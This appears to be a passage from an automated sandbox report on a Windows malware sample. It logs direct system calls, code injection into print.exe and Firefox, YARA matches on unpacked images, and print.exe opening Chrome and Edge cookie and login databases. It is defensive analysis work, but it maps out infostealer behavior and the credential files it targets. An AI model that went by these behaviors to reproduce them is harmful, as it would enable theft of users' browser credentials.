Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtDelayExecution: Direct from: 0x76EF2DDC
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtOpenKeyEx: Direct from: 0x76EF3C9C
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtSetInformationThread: Direct from: 0x76EE63F9
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtSetInformationThread: Direct from: 0x76EF2B4C
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtCreateKey: Direct from: 0x76EF2C6C

Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: NULL target: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Section loaded: NULL target: C:\Windows\SysWOW64\print.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: NULL target: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: NULL target: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4495132332.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152516352.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495197692.0000000001691000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4495132332.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152516352.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495197692.0000000001691000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4495132332.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152516352.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495197692.0000000001691000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4495132332.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152516352.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495197692.0000000001691000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\UnmxRI.exe	Queries volume information: C:\Users\user\Desktop\UnmxRI.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Queries volume information: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: Yara match	File source: 10.2.tehuvFgZlLZK.exe.26c1140.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UnmxRI.exe.27089b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tehuvFgZlLZK.exe.28f8b00.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UnmxRI.exe.24d10ec.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UnmxRI.exe.36139f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tehuvFgZlLZK.exe.28fbb30.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UnmxRI.exe.2727a28.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UnmxRI.exe.2727a28.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UnmxRI.exe.4fb0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tehuvFgZlLZK.exe.2917b78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tehuvFgZlLZK.exe.2917b78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tehuvFgZlLZK.exe.28fbb30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UnmxRI.exe.270b9e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tehuvFgZlLZK.exe.28f9b18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UnmxRI.exe.24d10ec.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UnmxRI.exe.270b9e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tehuvFgZlLZK.exe.26c1140.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UnmxRI.exe.6850000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UnmxRI.exe.6850000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UnmxRI.exe.27099c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2100365796.0000000006850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2086201250.00000000026E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2086201250.0000000002727000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2099884400.0000000004FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2169047373.0000000002917000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2169047373.0000000002691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2086201250.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2090039067.00000000035B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2169047373.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\print.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
